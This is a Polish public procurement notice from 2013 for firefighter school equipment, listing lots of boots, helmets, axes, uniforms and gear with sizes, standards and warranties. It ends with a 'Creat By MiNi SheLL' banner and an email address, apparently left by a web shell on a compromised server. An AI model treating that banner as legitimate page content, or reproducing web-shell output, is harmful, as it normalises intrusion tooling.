<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość: docelowo 120 par, z tym że:

- Wykonawca do dnia 12.07.2013r. dostarczy Zamawiającemu 180 par butów wg niżej wymienionych rozmiarów (na koszt Wykonawcy),
- W dniach od 26.07.2013r. do 31.07.2013r. Zamawiający wyda przybyłym do Szkoły Kandydatom buty w ilości 120 par,
- W dniu 01.08.2013r. Zamawiający zwróci wykonawcy pozostałe 60 par butów (na koszt Wykonawcy),
- Zamawiający zapłaci Wykonawcy za 120 par butów.

Rozmiary:
L.p.	Rozmiar	Ilość par
1	23	1
2	24	1
3	24,5	1
4	25	1
5	26	5
6	26,5	5
7	27	40
8	28	45
9	28,5	45
10	29	26
11	30	7
12	30,5	3

Opis:
Wykonane zgodnie z wymaganiami techniczno - użytkowymi pkt. 1.9. Buty Strażackie określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. (Dz. U. z 2007 r. nr 143. Poz. 1002 z późn. zm.).

Wyrób powinien spełniać wymagania obowiązujących norm scharmonizowanych w tym:
- PN-EN 15090/2012 
- PN-90/0-91123

Oznakowanie wyrobu:
Zgodne z obowiązującymi przepisami w tym  Rozporządzenia MSWiA z dnia 20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z póżn. zm.).

Z wariantowych wymagań wybiera się:
- sznurowane z systemem wiązań i zamków błyskawicznych, zapewniającym dopasowanie obuwia do nóg użytkownika.
- wykonane ze skóry w kolorze czarnym

Ponadto:
- buty z membraną wodoodporną, 
- sznurowadła wykonane z materiałów niepalnych - włókna aramidowe lub równoważne,
- zamek błyskawiczny z mechanizmem blokującym,
- muszą posiadać oznakowanie elementami z taśm odblaskowych w kolorze srebrnym i/lub fluorescencyjnym żółtym. Taśmy ostrzegawcze powinny być wykonane z materiału o tych samych parametrach co taśmy w ubraniach specjalnych wg pkt. 1.6.
- muszą posiadać system odprowadzania wilgoci z przestrzeni pomiędzy skórą i membraną,
- muszą posiadać metalowy lub inny równorzędny podnosek chroniący palce przed zgnieceniem oraz międzypodeszwę chroniącą stopę przed przebiciem równocześnie zapewniającą elastyczność,
- podeszwa wykonana z gumy, posiadająca samoczyszczący profil, odporna na działanie oleju napędowego, etyliny. Urzeźbienie podeszwy powinno być takie, żeby nie było ciągłych prostoliniowych rowków przecinających poprzecznie podeszwę o wysokości nie mniejszej niż 3mm, w śródstopiu poprzeczne urzeźbienie, którego wysokość powinna wynosić co najmniej 1,5 mm,
- minimum 1 przegub (amortyzator) nad piętą ułatwiający ruch stopy.

Gwarancja:
Minimum 24 m-ce..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.41.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.07.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Hełm strażacki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość: 80 szt.

Opis:
Wykonany zgodnie z wymaganiami techniczno - użytkowymi pkt. 1.10. Hełmy strażackie określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. (Dz. U. z 2007 r. nr 143. Poz. 1002 z późn. zm.).

Wyrób powinien spełniać wymagania obowiązujących norm scharmonizowanych w tym:
PN-EN 443

Z wariantowych wymagań wybiera się:
- skorupa hełmu wykonana w technologii wtryskowej,
- kolor czerwony,
- osłona karku wykonana z tkaniny (niemetalizowanej),
- osłona twarzy i oczu (przyłbica) chowana wewnątrz skorupy
- okulary antyodpryskowe chowane wewnątrz skorupy

Wymagane wyposażenie dodatkowe:
1) zaczepy do współpracy z nahełmowymi maskami aparatów oddechowych,
2) gniazdo, uchwyt - do zamocowania latarki,
3) regulacja hełmu możliwa bez zdejmowania z głowy,
4) podbródek na pasku z zapięciem.

Ponadto:
Zamiast wymaganego numeru JRG, którego Szkoła nie posiada, na czołowej stronie czerepu powinno być umieszczone Logo Zamawiającego wg podanego wzoru:

- Logo ma być umieszczone na białym tle w formie kwadratu o wymiarach 4 cm x 4 cm,
- Średnica logo 3,5 cm,
- Logo musi być zabezpieczone żywicą epoksydową lub inną skuteczną metodą - celem zabezpieczenia przed zniszczeniem.
010014 cm
Opis logo:
Znak ma po lewej stronie połowę krzyża maltańskiego w kolorze granatowym, a po prawej trzy języki płomienia w kolorze czerwonym, wszystko w wieńcu z liści w kolorze złotym.     W dole litery SGSP  w kolorze czarnym na czworoboku w kolorze złotym mającym jeden bok wypukły i jeden wklęsły, przy czym wszystkie elementy obrazowe mają kontur w kolorze czarnym.

Oznakowanie wyrobu:
Zgodne z obowiązującymi przepisami w tym  Rozporządzenia MSWiA z dnia  20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z póżn. zm.).

Gwarancja:
Minimum 24 m-ce..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.41.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zatrzaśnik strażacki duży.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość:60 szt.

Opis:
Zatrzaśnik strażacki duży: Wykonany zgodnie z wymaganiami techniczno - użytkowymi pkt. 5.6. Zatrzaśniki określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z późn. zm.).

Oznakowanie wyrobu:
Zgodne z obowiązującymi przepisami w tym  Rozporządzenia MSWiA z dnia 20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z późn. zm.).

Gwarancja:
Minimum 24 m-ce..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pasy strażackie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość: 60 szt.

Rozmiary: 
L.p.	Rozmiar	Ilość szt.
1.	1	20
2.	2	30
3.	3	10

Opis:
Wykonany zgodnie z wymaganiami techniczno - użytkowymi pkt. 1.5. Pasy strażackie określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z późn. zm.).

Oznakowanie wyrobu:
Zgodne z obowiązującymi przepisami w tym  Rozporządzenia MSWiA z dnia 20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z późn. zm.).

Gwarancja:
Minimum 24 m-ce..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Topór strażacki lekki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość: 70 szt.

Opis: 
Topór lekki - Wykonany zgodnie z Polską Normą PN-M-51501, wg. pkt. 6.4. Topory strażackie określonym szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z późn. zm.).

Oznakowanie wyrobu:
Zgodne z obowiązującymi przepisami w tym  Rozporządzenia MSWiA z dnia 20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z późn. zm.).

Gwarancja:
Minimum 24 m-ce..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pochewka na toporek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość: 	70 szt.

Opis: 
- Zgodna z Rozporządzeniem MSWiA - tabela należności Nr 5 przedmiotów ekwipunku osobistego dla strażaka (Dz. U. Nr. 4 poz. 25 z dnia 30 listopada 2005 r.) Zał. Nr 9.
- Wykonana ze skóry naturalnej w kolorze czarnym.  
- pasująca do toporka lekkiego określonego w pkt. 6.4. Topory strażackie Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. (Dz. U. z 2007 r.     nr 143. poz. 1002 z późn. zm.)
- pasująca (nadająca się do przypięcia) do pasa strażackiego określonego w pkt. 1.5 Pasy strażackie Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia                            20 czerwca 2007 r. (Dz. U. z 2007 r. nr 143. poz. 1002 z późn. zm.)
- posiadająca dwie kieszenie, w tym jedna na toporek,

Gwarancja:
Minimum 12 m-cy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.41.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Podpinka linkowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość: 	90 szt.

Opis: 
- wykonana z linki polipropylenowej o długości 1 m.,
- zakończona pętlą i haczykiem stalowym o średnicy ok. 8 mm,
- wielkość podpinki pozwalająca na spakowanie do pochewki na toporek,
- zgodna z rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z 30 listopada 2005 r. (Dz. U. Nr 4 poz. 25 z 2006 r.) - tabela należności Nr 5.

Gwarancja:
Minimum 12 m-cy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.41.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Ubrania koszarowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość: docelowo 220 kpl., z tym że w ramach dostawy w terminie do dnia 12.07.2013 r:

- Wykonawca do dnia 12.07.2013r. dostarczy Zamawiającemu 200 kpl. ubrań wg niżej      wymienionych rozmiarów (na koszt Wykonawcy)
- W dniach od 26.07.2013r. do 31.07.2013r. Zamawiający z dostarczonych rozmiarów wyda    przybyłym do Szkoły Kandydatom ubrania w ilości 120 kpl.
- W dniu 01.08.2013r. Zamawiający zwróci wykonawcy pozostałe 80 kpl. ubrań (na koszt Wykonawcy),
- Zamawiający zapłaci Wykonawcy za 220 kpl. ubrań (120 kpl - 12.07.2013 r. i 100 kpl. - 20.09.2013 r.)

Rozmiary: dostawa do dnia 12 lipiec 2013r.
L.p.	Rozmiar	Ilość kpl.
1	A1	30
2	A2	50
3	A3	40
4	A4	30
5	B2	15
6	B3	20
7	B4	14
8	wzrost	ob. klatki piersiowej	ob. pasa	Ilość kpl.

	192	120	100	1

Rozmiary na pozostałe 100 kpl. z terminem dostawy do 20.09.2013 r. Zamawiający poda do dnia 27.08.2013r.

Opis:
4 częściowe - bluza, spodnie, czapka, kamizelka (kamizelka bez rękawów).
Wykonane zgodnie z Zarządzeniem Nr 9 Komendanta Głównego Państwowej Straży Pożarnej z dnia 5 lutego 2007 r. (Dz. Urz. KG PSP z dnia 23 października 2009 r.) - KT 22.

Gwarancja:
Minimum 12 m-cy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.81.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.09.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Obuwie koszarowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość: docelowo 100 par, z tym że:

- Wykonawca do dnia 12.07.2013r. dostarczy Zamawiającemu 150 par butów wg niżej wymienionych rozmiarów (na koszt Wykonawcy),
- W dniach od 26.07.2013r. do 31.07.2013r. Zamawiający wyda przybyłym do Szkoły Kandydatom buty w ilości 100 par,
- W dniu 01.08.2013r. Zamawiający zwróci wykonawcy pozostałe 50 par butów (na koszt Wykonawcy),
- Zamawiający zapłaci Wykonawcy za 100 par butów.

Rozmiary: 
L.p.	Rozmiar	Ilość par
1	25	2
2	25,5	3
3	26	5
4	26,5	10
5	27	25
6	27,5	28
7	28	27
8	28,5	25
9	29	15
10	29,5	10

Opis: 
Zgodne z Zarządzeniem Nr 9 Komendanta Głównego PSP (Dz.Urz. nr 2 z 23.10.2009r)
Nr Karty technicznej - KT- 27

Gwarancja:
Minimum 12 m-cy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.41.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.07.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Ubranie dla kadry dowódczo - sztabowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis:
Ubrania KDS wykonane zgodnie z Zarządzeniem nr 9 Komendanta Głównego PSP (Dz. Urz. 2 z dnia 23 października 2009r.) numer karty technicznej KT - 23

Ilość: 	20 kpl. 

Termin dostawy: 10 dni od złożenia zamówienia przez Zamawiającego na piśmie 
- nie później niż do 29 listopada 2013r. - faxem 

Gwarancja:
Minimum 12 m-cy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.81.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Buty dla kadry dowódczo - sztabowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis:
Buty dla Kadry dowódczo sztabowej wykonane zgodnie z Zarządzeniem nr 9 Komendanta Głównego PSP (Dz. Urz. 2 z dnia 23 października 2009r.) numer karty technicznej KT - 28

Ilość: 	20 par 

Termin dostawy: 10 dni od złożenia zamówienia przez Zamawiającego na piśmie 
-  nie później niż do 29 listopada 2013r. - faxem 

Gwarancja:
Minimum 12 m-cy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.41.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Sztormiak.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość: 	40 szt.

Rozmiary:
L.p.	Wzrost	Obw. kl. pierś.	Ilość
1	176	96	5
2	176	100	13
3	182	104	10
4	188	104	10
5	188	112	2

Opis:
Wykonane zgodnie z Zarządzeniem Nr 9 Komendanta Głównego Państwowej Straży Pożarnej (Dziennik Urzędowy nr 2 KG PSP z 2009 r.) w sprawie wzorców oraz szczegółowych wymagań cech technicznych i jakościowych przedmiotów umundurowania, odzieży specjalnej i środków ochrony indywidualnej użytkowanych w PSP - Numer karty wymagań technicznych: KT 39.

Gwarancja:
Minimum 24 m-ce..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.41.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Koszulka letnia i koszulka zimowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość: 
- koszulka letnia - 200 szt.
- koszulka zimowa - 100 szt.

Rozmiary:

Koszulka letnia:
L.p.	Rozmiar	Ilość szt.
1.	M	70
2.	L	130

Koszulka zimowa:

Zamawiający poda rozmiary do dnia 26 sierpień 2013 r.

Opis:
Koszulka letnia: Wykonana zgodnie z Zarządzeniem Nr 9 Komendanta Głównego Państwowej Straży Pożarnej (Dziennik Urzędowy nr 2 KG PSP z 2009 r.) w sprawie wzorców oraz szczegółowych wymagań cech technicznych i jakościowych przedmiotów umundurowania, odzieży specjalnej i środków ochrony indywidualnej użytkowanych w PSP - Numer karty wymagań technicznych: KT 6.

Ponadto:
Zamiast wymaganego w KT 6 pkt. 2.5. emblematu PSP i napisu STRAŻ, koszulka musi posiadać:

1. W przodzie koszulki po lewej stronie na wysokości piersi kieszeń z logo SGSP wg. wzoru:

średnica 67 mm (tolerancja 1 mm)


Opis logo:
Znak ma po lewej stronie połowę krzyża maltańskiego w kolorze granatowym, a po prawej trzy języki płomienia w kolorze czerwonym, wszystko w wieńcu z liści w kolorze złotym.     W dole, litery SGSP  w kolorze czarnym na czworoboku w kolorze złotym mającym jeden bok wypukły i jeden wklęsły, przy czym wszystkie elementy obrazowe mają kontur w kolorze czarnym.

2. Na plecach napis SGSP o wymiarach : długość 28,30 cm x wysokość 6,46 cm.
    Kolor zgodny z KT 6 jak napis STRAŻ.

Logo i napis wykonane metodą haftu komputerowego bądź inną techniką pozwalającą odwzorować ww. elementy, zgodnie z KT 6.


Koszulka zimowa: Wykonana zgodnie z Zarządzeniem Nr 9 Komendanta Głównego Państwowej Straży Pożarnej (Dziennik Urzędowy nr 2 KG PSP z 2009 r.) w sprawie wzorców oraz szczegółowych wymagań cech technicznych i jakościowych przedmiotów umundurowania, odzieży specjalnej i środków ochrony indywidualnej użytkowanych w PSP - Numer karty wymagań technicznych: KT 7.

Gwarancja:
Minimum 12 m-cy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.41.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.09.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Worek marynarski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość: 90 szt.

Opis: 
Wykonany z wysokiej jakości materiałów brezentowych bawełnianych i lnianych impregnowanych -  wodoodpornych. Wysoka wytrzymałość na ścieranie i rozdarcia. Posiada pas na ramię, wzmocniony na dole, ściągany sznurem przewlekanym przez oczka metalowe, 
z klamrą metalową, zapinką i kłódką. Pojemność użytkowa 150 ltr., wysokość 1 metr. 
Kolor ciemny granat.

Gwarancja:
Minimum 12 m-cy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.93.11.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Plecak kostka - khaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość: 60 szt.

Opis: 
- Plecak w kolorze khaki,
- Wytrzymały na ścieranie i rozdarcia,
- Na klapie posiada mocowanie na menażkę,
- Wymiary: wys: 37 cm, szer: 31 cm, gł.: 22 cm (+/- 5 cm), 
- wykonane z mocnego materiału np. brezent, bawełna, len, impregnowany, wodoodporny, ze wzmocnionym spodem,
- szerokie szelki,

Gwarancja:
Minimum 12 m-cy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.93.11.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Manierka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość: 	30 szt.

Opis: 
- pojemność ok.  1,0 l,
- posiada pokrowiec,
- korek manierki przymocowany do szyjki specjalnym, zabezpieczającym przed zgubieniem paskiem,
- na zewnątrz pokrowca kieszonka na tabletki do odkażania wody,
- posiada mocowanie do paska lub plecaka.
Musi posiadać dopuszczenie do kontaktu z żywnością.

Gwarancja:
Minimum 12 m-cy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.12.60-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Menażka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość: 30 szt.

Opis: 
Typ wojskowy, z wysokiej jakości stali kwasoodpornej, pojemność kociołka ok. 1,2 l., pojemność pokrywy do 0,8 l. Waga menażki nie powinna przekroczyć 0,9 kg. 
Musi posiadać dopuszczenie do kontaktu z żywnością.

Dopuszcza się również alternatywnie zaoferowanie menażki trzyczęściowej zawierającej jedno naczynie zamykane o pojemności ok. 1,2 l., jedno naczynie płytkie o pojemności 
ok. 0,8 l.

Gwarancja:
Minimum 12 m-cy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.12.60-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Półbuty służbowe męskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość: 100 par

Zamawiający poda rozmiary do dnia 27 sierpień 2013 r.

Opis:
Wykonanie zgodne z Wymaganiami Technicznymi dla półbutów służbowych, Numer Karty Wymagań Technicznych KT - 25, określonymi w Zarządzeniu Nr 9 Komendanta Głównego Państwowej Straży Pożarnej z dnia 5 lutego 2007 r. w sprawie wzorców oraz szczegółowych wymagań, cech technicznych i jakościowych przedmiotów umundurowania, odzieży specjalnej i środków ochrony indywidualnej użytkowanych w Państwowej Straży Pożarnej (Dz. U. KGPSP nr 2  z dnia  23 października 2009 r.), 

Gwarancja:
Minimum 12 m-cy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.41.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.09.2013.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Teczka służbowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość: 10 sztuk

Opis:
Wykonanie zgodnie z Wymaganiami Technicznymi dla teczki służbowej, Numer Karty Wymagań Technicznych KT - 41, określonymi w Zarządzeniu Nr 9 Komendanta Głównego Państwowej Straży Pożarnej z dnia 5 lutego 2007 r. w sprawie wzorców oraz szczegółowych wymagań, cech technicznych i jakościowych przedmiotów umundurowania, odzieży specjalnej i środków ochrony indywidualnej użytkowanych w Państwowej Straży Pożarnej (Dz. U. KGPSP nr 2 z dnia 23 października 2009 r.).

Gwarancja:
Minimum 12 m-cy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.93.11.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Okres gwarancji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Walizka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość: 10 sztuk

Opis:
Wykonanie zgodnie z Wymaganiami Technicznymi dla walizki, Numer Karty Wymagań Technicznych KT - 42, określonymi w Zarządzeniu Nr 9 Komendanta Głównego Państwowej Straży Pożarnej z dnia 5 lutego 2007 r. w sprawie wzorców oraz szczegółowych wymagań, cech technicznych i jakościowych przedmiotów umundurowania, odzieży specjalnej i środków ochrony indywidualnej użytkowanych w Państwowej Straży Pożarnej (Dz. U. KGPSP nr 2 z dnia 23 października 2009 r.).

Gwarancja:
Minimum 12 m-cy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.93.11.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2013.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com